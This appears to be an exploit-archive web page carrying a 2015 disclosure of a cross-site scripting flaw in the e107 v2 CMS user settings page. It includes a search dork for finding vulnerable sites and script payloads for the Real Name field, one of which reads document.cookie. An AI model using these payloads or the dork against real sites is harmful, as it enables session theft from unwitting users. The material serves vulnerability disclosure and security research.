<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-45</title>
    </head>
    <body>
        <center>
                <a  href="https://mr-msa.xyz/guexdb/exploits/exploit-45" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
            ########################################################
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
########################################################
# Google Dork: Proudly powered by e107
# Date: [19/11/2015]
# Exploit Author: Guardiran Security Team =&gt;DeMoN
# Vendor Homepage: [http://e107.org/]
# Software Link: [-]
# Version: All Version
# Tested on: [Win 8.1/Google chrome]
# CVE : [-]
########################################################
# DISCRIPTION: Hello Guys.
# CMS user details section is vulnerable to XSS. You can run XSS payloads.
# XSS Vulnerability #1:
# Go Update user settings page
# &quot;http://{target-url}/usersettings.php&quot;
# Set Real Name value;
# &quot;&gt;&lt;script&gt;alert(String.fromCharCode(88, 83, 83))&lt;/script&gt;
# or
# &quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
########################################################
# Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T
# We Are Guardiran Security Team
# Discovered By:DeMoN
########################################################        </pre>
    </body>
</html>